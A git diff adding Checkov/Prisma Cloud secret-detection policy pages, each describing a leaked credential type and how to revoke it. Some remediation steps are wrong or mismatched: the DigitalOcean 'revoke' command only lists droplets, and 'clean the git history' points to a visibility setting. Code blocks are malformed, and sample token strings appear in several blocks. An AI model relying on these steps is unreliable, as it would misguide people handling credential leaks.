b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-28.adoc @@ -0,0 +1,92 @@ +== Buildkite Agent Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b440bbd1-34e4-48dd-ae3d-89738d508ff3 + +|Checkov Check ID +|CKV_SECRET_28 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Buildkite Agent requires an agent token to connect to Buildkite and register for work. +If you are an admin of your Buildkite organization, you can view the tokens on your Agents page. +When you create a new organization in Buildkite, a default agent token is created. +This token can be used for testing and development, but it's recommended to create new, specific tokens for each new environment. + +=== Fix - Buildtime + + +*Buildkite Tokens can be revoked using the GraphQL API with the agentTokenRevoke mutation.* + + +You need to pass your agent token as the ID in the mutation. +You can get the token from your Buildkite dashboard, in Agents > Reveal Agent Token, or you can retrieve a list of agent token IDs using this query: + + +[source,php] +---- +{ + "query GetAgentTokenID { + organization(slug: "organization-slug") { + agentTokens(first:50) { + edges { + node { + id + uuid + description + } + + } + } + + } +}", + +} +---- + +Then, using the token ID, revoke the agent token: + + +[source,php] +---- +{ + "mutation { + agentTokenRevoke(input: { + id: "token-id", + reason: "A reason" + }) { + + agentToken { + description + revokedAt + revokedReason + } + + } +} + +", + "language": "php" +} +---- diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-29.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-29.adoc new file mode 100644 index 000000000..fba731f5a --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-29.adoc @@ -0,0 +1,65 @@ +== CircleCI Personal Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 10fac584-5171-4acb-8fcf-818c48e93cd5 + +|Checkov Check ID +|CKV_SECRET_29 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +To use the CircleCI API or view details about your pipelines, you will need API tokens with the appropriate permissions. +This document describes the types of API tokens available, as well as how to create and delete them. +There are two types of API token you can create within CircleCI. +Personal: These tokens are used to interact with the CircleCI API and grant full read and write permissions. +Project: These tokens allow you to read/write information for specific projects. +Project tokens have three scope options: Status, Read Only, and Admin. +- Status tokens grant read access to the project's build statuses. +Useful for embedding status badges. +- Read Only tokens grant read only access to the project's API. +- Admin tokens grant read and write access for the project's API. + +=== Fix - Buildtime + + +*CircleCI* + + + +. In the CircleCI application, go to your User settings + +. Click Personal API Tokens + +. Click the X in the Remove column for the token you wish to replace and confirm your deletion. + +. Click the Create New Token button. + +. In the Token name field, type a new name for the old token you are rotating. ++ +It can be the same name given to the old token. + +. Click the Add API Token button. + +. After the token appears, copy and paste it to another location. ++ +You will not be able to view the token again. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-3.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-3.adoc new file mode 100644 index 000000000..701cb96fc --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-3.adoc @@ -0,0 +1,57 @@ +== Azure Storage Account Access Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 12e76aca-9fa6-4eed-92ba-ee6acfe0cbeb + +|Checkov Check ID +|CKV_SECRET_3 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +When you create a storage account, Azure generates two 512-bit storage account access keys. +These keys can be used to authorize access to data in your storage account via Shared Key authorization. +Leaking this key can thus compromise the concerned data. + +=== Fix - Buildtime +*Azure* + + +. Revoke the exposed secret. ++ +To revoke a user delegation SAS, revoke the user delegation key to quickly invalidate all signatures associated with that key. ++ +To revoke a service SAS that is associated with a stored access policy, you can delete the stored access policy, rename the policy, or change its expiry time to a time that is in the past. ++ + +[source,text] +---- +{ + "POST https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/revokeUserDelegationKeys?api-version=2021-04-01", +} +---- + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Inspect Azure Activity Logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-30.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-30.adoc new file mode 100644 index 000000000..1465a673a --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-30.adoc @@ -0,0 +1,50 @@ +== Codecov API key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d047a76c-6d7f-4281-bcb9-9e9c79b896d2 + +|Checkov Check ID +|CKV_SECRET_30 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Codecov is a tool that is used to measure the test coverage of your codebase. +It generally calculates the coverage ratio by examining which lines of code were executed while running the unit tests. +When linking a GitHub account to Codecov, the service can be restricted to public repositories only, or be allowed to access private repositories as well. + +=== Fix - Buildtime + + +*Codecov* + + + +. Revoke the key + +. In Codecov, click on Settings + +. Click on API in the left sidebar + +. Find the API key exposed and click on Revoke + +. Monitor for abuse of the credential diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-31.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-31.adoc new file mode 100644 index 000000000..9e7b1cc44 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-31.adoc @@ -0,0 +1,40 @@ +== Coinbase Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d54bf289-817a-41bc-8f31-3502ab3db364 + +|Checkov Check ID +|CKV_SECRET_31 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Coinbase, is an American publicly traded company that operates a cryptocurrency exchange platform. +Coinbase is a distributed company. +It is the largest cryptocurrency exchange in the United States by trading volume. + +=== Fix - Buildtime + + +*Coinbase The API key can be revoked from your dashboard in the API tab.* + + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-32.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-32.adoc new file mode 100644 index 000000000..5259474ae --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-32.adoc @@ -0,0 +1,50 @@ +== Confluent Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 720b664c-19cb-4e26-a6e5-1beb402734a5 + +|Checkov Check ID +|CKV_SECRET_32 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +API keys for Confluent Cloud can be created with user and service accounts. +A service account is intended to provide an identity for an application or service that needs to perform programmatic operations within Confluent Cloud. +When moving to production, ensure that only service account API keys are used. +Avoid user account API keys, except for development and testing. +If a user leaves and a user account is deleted, all API keys created with that user account are deleted and might break applications. + +=== Fix - Buildtime + + +*Confluent Cloud* + + + +. From the appropriate API Access tab for the Kafka, Schema Registry, or ksqlDB resource, select the key that you want to delete. + +. Click the trash icon. ++ +The Confirm API key deletion dialog appears. + +. Click Confirm. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-33.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-33.adoc new file mode 100644 index 000000000..51154d5e3 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-33.adoc @@ -0,0 +1,53 @@ +== Databricks Authentication Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1979aa5f-0e33-4521-b7aa-0d7f18f298ca + +|Checkov Check ID +|CKV_SECRET_33 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +To authenticate to and access Databricks REST APIs, you can use Databricks personal access tokens or passwords. +Databricks strongly recommends that you use tokens. +Tokens replace passwords in an authentication flow and should be protected like passwords. + +To protect tokens, Databricks recommends that you store tokens in: + +* Secret management and retrieve tokens in notebooks using the Secrets utility (dbutils.secrets). +* A local key store and use the Python keyring package to retrieve tokens at runtime. + +=== Fix - Buildtime + + +*Databricks* + + + +. Find the token ID. ++ +See Get tokens for the workspace. + +. Call the delete a token API (DELETE /token-management/tokens). ++ +Pass the token ID in the path. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-34.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-34.adoc new file mode 100644 index 000000000..7b7fab450 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-34.adoc @@ -0,0 +1,58 @@ +== DigitalOcean Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0a2d7460-9379-438d-9e0b-ab2976a826e0 + +|Checkov Check ID +|CKV_SECRET_34 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +To use the DigitalOcean API, you'll need to generate a personal access token. +Personal access tokens function like ordinary OAuth access tokens. +You can use them to authenticate to the API by including one in a bearer-type Authorization header with your request. +Tokens function like passwords. +Do not hard code your tokens into programs where they may accidentally be released in version control and are harder to rotate. +Instead, use environmental variables. +If a token becomes compromised, delete it to revoke that token's access. + +=== Fix - Buildtime + + +*DigitalOcean* + + + +. Revoke Token Use the access_token in your token revocation request, which is a POST request to the revoke endpoint with the appropriate parameters. ++ +https://cloud.digitalocean.com/v1/oauth/revoke ++ + +[source,curl] +---- +{ + "curl -X GET "https://api.digitalocean.com/v2/droplets" \\ + -H "Authorization: Bearer $TOKEN"", +} +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-35.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-35.adoc new file mode 100644 index 000000000..43ac73c20 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-35.adoc @@ -0,0 +1,52 @@ +== Discord Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b0e5f091-e7de-4d70-bbcf-3289a307c0eb + +|Checkov Check ID +|CKV_SECRET_35 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Discord token provides full access to your account and is required to perform actions within Discord. +It's also useful for allowing bots to do things on your behalf outside of the Discord client. +If you need your Discord token, the only way to find it is via Discord's developer tools. + +=== Fix - Buildtime + + +*Discord* + + + + +[source,curl] +---- +POST https://discord.com/api/oauth2/token/revoke +Content-Type: application/x-www-form-urlencoded +data: + client_id: + client_secret: + token: +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-36.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-36.adoc new file mode 100644 index 000000000..5d393328f --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-36.adoc @@ -0,0 +1,57 @@ +== Doppler API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 009c3b4c-16cf-4c85-9b1d-4ab39fdbfb8b + +|Checkov Check ID +|CKV_SECRET_36 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The API uses Doppler tokens to authenticate requests. +You can generate and manage your tokens in the dashboard on the Tokens page. +Tokens carry many privileges, so be sure to keep them secure! +Do not store your secret tokens in an .env file or share them in publicly accessible areas such as GitHub, client-side code, etc. +Personal and CLI tokens can both read and write in a workspace and service tokens are read-only in a single configuration. + +=== Fix - Buildtime + + +*Doppler* + + + + +[source,curl] +---- +curl --request POST \ + --url https://api.doppler.com/v3/auth/revoke \ + --header 'Accept: application/json' \ + --header 'Content-Type: application/json' \ + --data ' +{ + "token": "" +} +' +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-37.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-37.adoc new file mode 100644 index 000000000..1daabed4f --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-37.adoc @@ -0,0 +1,55 @@ +== DroneCI Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5686a696-223c-4b07-b5bf-427c780125a9 + +|Checkov Check ID +|CKV_SECRET_37 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The remote API uses access tokens to authorize requests. +You can retrieve an access token in the Drone user interface by navigating to your user profile. +Authorization to the API is performed using the HTTP Authorization header. +Provide your token as the bearer token value. +If your repository is private or requires authentication to clone, Drone injects the credentials into your pipeline environment. +Drone uses the oauth2 token associated with the repository owner as the clone credentials. + +=== Fix - Buildtime + + +*DroneCI* + + + +. Revoke the token + +. On the DroneCI page, click on your avatar, then Account + +. Click on Security + +. In the API Tokens section, find the compromised token + +. Click on Delete + +. Monitor for abuse diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-38.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-38.adoc new file mode 100644 index 000000000..b802d49bc --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-38.adoc @@ -0,0 +1,52 @@ +== Dropbox App Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8f4d0292-8ddc-4505-a52d-3ce1280fc321 + +|Checkov Check ID +|CKV_SECRET_38 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +When working with the Dropbox APIs, your app will access Dropbox on behalf of your users. You'll need to have each user of your app sign into dropbox.com to grant your app permission to access their data on Dropbox. Dropbox uses OAuth 2.0, an open specification, to authorize access to a user’s data. Once completed by a user, the OAuth flow returns an access token to your app. This authorization token your app and user in subsequent API calls. It should be passed with the Authorization HTTP header value of Bearer. + +=== Fix - Buildtime + + +*Dropbox* + +`/token/revoke` Disables the access token used to authenticate the call. + + +If there is a corresponding refresh token for the access token, this disables that refresh token, as well as any other access tokens for that refresh token. + + +[source,text] +---- +{ + "curl -X POST https://api.dropboxapi.com/2/auth/token/revoke \\ + --header "Authorization: Bearer " +", +} +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-39.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-39.adoc new file mode 100644 index 000000000..75d1234c4 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-39.adoc @@ -0,0 +1,45 @@ +== Dynatrace token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a4e5aa1e-94ba-4aa1-ab46-1f137b10110c + +|Checkov Check ID +|CKV_SECRET_39 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +To be authenticated to use the Dynatrace API, you need a valid access token or a valid personal access token. +Access to the API is fine-grained, meaning that you also need the proper scopes assigned to the token. +See the description of each request to find out which scopes are required to use it. +Dynatrace uses a unique token format consisting of three components separated by dots (.). +`dt0c01.ST2EY72KQINMH574WMNVI7YN.G3DFPBEJYMODIDAEX454M7YWBUVEFOWKPRVMWFASS64NFH52PX6BNDVFFM572RZM` +The part of a token composed of the prefix and public portion is a token identifier. +For example dt0c01.ST2EY72KQINMH574WMNVI7YN. +Token identifier can be safely displayed in the UI and can be used for logging purposes. + +=== Fix - Buildtime + + +*Dynatrace To execute this request, you need an access token with Write API tokens (apiTokens.write) scope: Managed `+https://{your-domain}/e/{your-environment-id}/api/v2/apiTokens/{id}+` SaaS: `+https://{your-environment-id}.live.dynatrace.com/api/v2/apiTokens/{id}+` Environment: `+ActiveGate https://{your-activegate-domain}/e/{your-environment-id}/api/v2/apiTokens/{id}+`* + + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-4.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-4.adoc new file mode 100644 index 000000000..31f662f0c --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-4.adoc @@ -0,0 +1,45 @@ +== Basic Auth Credentials + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7cbba17c-f37e-4594-9d6f-5cb09225de0a + +|Checkov Check ID +|CKV_SECRET_4 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Basic authentication is a simple authentication scheme built into the HTTP protocol. +The client sends HTTP requests with the Authorization header that contains the word Basic word followed by a space and a base64-encoded string username:password. +Leaked usernames and password can be used by attackers to attempt to authenticate to existing accounts and steal information they hold. + +=== Fix - Buildtime +*Multiple Services* + + +. Revoke the exposed secret. + +. Clean the git history. ++ +Go under the settings section of your GitHub project and chose the change visibility button at the bottom. + +. Inspect your application's access logs to ensure the key was not utilized during the compromised period. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-40.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-40.adoc new file mode 100644 index 000000000..ad32fd74d --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-40.adoc @@ -0,0 +1,51 @@ +== Elastic Email Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9567784e-cd7a-4fdf-9dc1-dcf90adbe6b1 + +|Checkov Check ID +|CKV_SECRET_40 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Elastic Email is a mail relay service. +That is, instead of your website sending mail via its own SMTP server, outgoing email is directed through the Elastic Email service and out onto the internet. +The API Key is a 96-character single GUID and it is the key to your account when trying to gain access or make API calls while outside of the User Interface. +Every API call will require this key. +It is unique for API connections and separate from SMTP Relay communication. + +=== Fix - Buildtime + + +*Elastic Email Permanently delete AccessToken from your Account:* + + + + +[source,text] +---- +{ + "https://api.elasticemail.com/v2/accesstoken/delete?apikey=7H29A61A88F5D6F1CX5CC79IWQADW3EFC98CD5F4428W7WU2B873256BCECCDCIAP8A5C4JS6A29675XHFBED2DFCDF9I1QW&tokenName=My Token&type=", +} +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-41.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-41.adoc new file mode 100644 index 000000000..c6cd7c141 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-41.adoc @@ -0,0 +1,56 @@ +== Fastly Personal Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 96ca6d09-8c3e-47f2-b5d7-f5c2181fb387 + +|Checkov Check ID +|CKV_SECRET_41 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Fastly's API tokens are unique authentication credentials assigned to individual users. +You need to create an API token to use the Fastly API. +You can use API tokens to grant applications restricted access to your Fastly account and services. +For example, an engineer user could limit a token to only have access to a single service, and restrict the scope to only allow that token to purge by URL. +Every Fastly user can create up to 100 API tokens. + +=== Fix - Buildtime + + +*Fastly To delete an account API token or to revoke another user's API token as a superuser, follow the steps below:* + + + +. Log in to the Fastly web interface and click the Account link from the user menu. ++ +Your account information appears. + +. Click the Account API tokens link. ++ +The Account API Tokens page appears with a list of tokens associated with your organization's Fastly account. + +. Find the API token you want to delete and click the trash icon. ++ +A warning message appears. + +. Click the Delete button to permanently delete the API token. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-42.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-42.adoc new file mode 100644 index 000000000..783028de5 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-42.adoc @@ -0,0 +1,48 @@ +== FullStory API Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 84c57881-ad48-4959-8036-84c20699c43d + +|Checkov Check ID +|CKV_SECRET_42 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +FullStory's HTTP APIs use API keys for authentication. +If you are configuring an integration or building some tools of your own that make HTTP calls, you will need a key. +In the FullStory UI the "`All Keys`" tab shows you all the keys that you have permission to view. +If you are an Administrator, then in addition to keys that you have created, you'll also be able to see other users`' keys and legacy keys. +If you are a Standard or Architect user, you will only be able to see your own keys. +Administrators who might be looking at a long list of keys can click the "`My Keys`" tab to view only their own keys, or the "`Legacy Keys`" tab to view any legacy keys. + +=== Fix - Buildtime + + +*FullStory To delete a key, click the "`Delete`" button that appears at the end of the row where the key is displayed.* + + +When you delete a key, API calls making use of the key value will stop working immediately. +Administrators may delete keys for all users. +Standard and Architect users may only delete their own keys. +Note that removing or changing the permissions of a user does not affect any API keys that may have been created by that user. +For example, if you change a user from "Admin" to "Guest" and wish to remove API keys they may have created, you'll need to do that at the settings page following the instructions above. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-43.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-43.adoc new file mode 100644 index 000000000..8fc36188e --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-43.adoc @@ -0,0 +1,88 @@ +== GitHub Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7864b6ac-5de9-4845-81f0-b9d9de32a0ca + +|Checkov Check ID +|CKV_SECRET_43 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + + + +*GitHub Personal Access Token* + +Personal access tokens (PATs) are an alternative to using passwords for authentication to GitHub when using the GitHub API or the command line. +If you want to use a PAT to access resources owned by an organization that uses SAML SSO, you must authorize the PAT. + + +*GitHub OAuth Access Token* + +GitHub's OAuth implementation supports the standard authorization code grant type and the OAuth 2.0 Device Authorization Grant for apps that don't have access to a web browser.* +If you want to skip authorizing your app in the standard way, such as when testing your app, you can use the non-web application flow. +To authorize your OAuth app, consider which authorization flow best fits your app. + + +*GitHub App Token* + +After you create a GitHub App, you'll need to generate one or more private keys. +You'll use the private key to sign access token requests. +You can create multiple private keys and rotate them to prevent downtime if a key is compromised or lost. + + +*GitHub Refresh Token* +To enforce regular token rotation and reduce the impact of a compromised token, you can configure your GitHub App to use expiring user access tokens. +Expiring user tokens expire after 8 hours. +When you receive a new user-to-server access token, the response will also contain a refresh token, which can be exchanged for a new user token and refresh token. +Refresh tokens are valid for 6 months. + +=== Fix - Buildtime + + +*GitHub App Token* + + + +. In the upper-right corner of any page, click your profile photo, then click Settings. + +. In the "Integrations" section of the sidebar, click Applications. + +. Click the Authorized OAuth Apps tab. + +. Review the tokens that have access to your account. ++ +For those that you don't recognize or that are out-of-date, click , then click Revoke. ++ +To revoke all tokens, click Revoke all. ++ + +[source,text] +---- +curl \ + -X DELETE \ + -H "Accept: application/vnd.github+json" \ + -H "Authorization: Bearer " \ + https://api.github.com/applications/Iv1.8a61f9b3a7aba766/token \ + -d '{"access_token":"e72e16c7e42f292c6912e7710c838347ae178b4a"}' +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-44.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-44.adoc new file mode 100644 index 000000000..de2f51138 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-44.adoc @@ -0,0 +1,59 @@ +== GitLab Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 14db94b2-590d-484b-98c5-b96aec2cfe97 + +|Checkov Check ID +|CKV_SECRET_44 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Personal access tokens can be an alternative to OAuth2 and used to: + +* Authenticate with the GitLab API. +* Authenticate with Git using HTTP Basic Authentication. + +In both cases, you authenticate with a personal access token in place of your password. +Personal access tokens are: + +* Required when two-factor authentication (2FA) is enabled. +* Used with a GitLab username to authenticate with GitLab features that require usernames. + +For example, GitLab-managed Terraform state backend and Docker container registry, + +* Similar to project access tokens and group access tokens, but are attached to a user rather than a project or group. + +=== Fix - Buildtime + + +*GitLab* + + + +. In the top-right corner, select your avatar. + +. Select Edit profile. + +. On the left sidebar, select Access Tokens. + +. In the Active personal access tokens area, next to the key, select Revoke. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-45.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-45.adoc new file mode 100644 index 000000000..0dab22237 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-45.adoc @@ -0,0 +1,53 @@ +== Google Cloud Keys + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9d1b426e-4498-4660-a34f-8a43beb0a2b7 + +|Checkov Check ID +|CKV_SECRET_45 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Google Cloud API key can be used to authenticate to an API. +The API key associates the request with a Google Cloud project for billing and quota purposes. +Because API keys do not identify the caller, they are generally used for accessing public data or resources. +Many Google Cloud APIs do not accept API keys for authentication. +When you use Google Cloud API keys in your applications, ensure that they are kept secure during both storage and transmission. +Publicly exposing your API keys can lead to unexpected charges on your account. + +=== Fix - Buildtime + + +*Google Cloud* + + + +. Navigate to APIs & Services console at https://console.cloud.google.com/apis/credentials. + +. In the main navigation panel, select Credentials to access the list of the API keys created for the selected Google Cloud Platform (GCP) project. ++ +3.On the Credentials page, in the API Keys section, select the API key that you want to delete, and choose DELETE button from the console top menu to remove the selected key from your GCP project. + +. Inside the Delete credential confirmation box, choose DELETE to confirm the removal action. ++ +The selected API key will be deleted immediately and permanently. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-46.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-46.adoc new file mode 100644 index 000000000..3c8e109ce --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-46.adoc @@ -0,0 +1,52 @@ +== Grafana Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b0a8cae4-c04e-4a99-a64e-b582d3e83000 + +|Checkov Check ID +|CKV_SECRET_46 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Grafana API key is a randomly generated string that external systems use to interact with Grafana HTTP APIs. +When you create an API key, you specify a Role that determines the permissions associated with the API key. +Role permissions control that actions the API key can perform on Grafana resources. + +=== Fix - Buildtime + + +*Grafana `DELETE /api/auth/keys/:id`* + + + + +[source,text] +---- +{ + "DELETE /api/auth/keys/3 HTTP/1.1 +Accept: application/json +Content-Type: application/json +Authorization: Bearer eyJrIjoiT0tTcG1pUlY2RnVKZTFVaDFsNFZXdE9ZWmNrMkZYbk", +} +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-47.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-47.adoc new file mode 100644 index 000000000..0b871077c --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-47.adoc @@ -0,0 +1,76 @@ +== Terraform Cloud API Token + +Cloud API Token + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 56b81a7c-1927-405e-be9e-c3213af08142 + +|Checkov Check ID +|CKV_SECRET_47 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Terraform Cloud supports three distinct types of API tokens with varying levels of access: user, team, and organization. +API tokens are displayed only once when they are created, and are obfuscated thereafter. +If the token is lost, it must be regenerated. + + +*User API Tokens User tokens are the most flexible token type because they inherit permissions from the user they are associated with.* + + + + +*Team API Tokens Team API tokens allow access to the workspaces that the team has access to, without being tied to any specific user.* + + +Each team can have one valid API token at a time, and any member of a team can generate or revoke that team's token. +When a token is regenerated, the previous token immediately becomes invalid. + + +*Organization API Tokens Organization API tokens allow access to the organization-level settings and resources, without being tied to any specific team or user.* + + +To manage the API token for an organization, go to Organization settings > API Token and use the controls under the "Organization Tokens" header. +Each organization can have one valid API token at a time. +Only organization owners can generate or revoke an organization's token. + +=== Fix - Buildtime + + +*Terraform* + + +Cloud `DELETE /authentication-tokens/:id` + + +[source,text] +---- +{ + "curl \\ + --header "Authorization: Bearer $TOKEN" \\ + --header "Content-Type: application/vnd.api+json" \\ + --request DELETE \\ + https://app.terraform.io/api/v2/authentication-tokens/at-6yEmxNAhaoQLH1Da +", +} +---- + diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-48.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-48.adoc new file mode 100644 index 000000000..e643c4129 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-48.adoc @@ -0,0 +1,53 @@ +== Heroku Platform Key + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ab6c1821-7b25-43d6-9ff0-ba300479c1ac + +|Checkov Check ID +|CKV_SECRET_48 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +Heroku is a cloud platform as a service (PaaS) supporting several programming languages. +The Heroku network runs the customer's apps in virtual containers which execute on a reliable runtime environment. 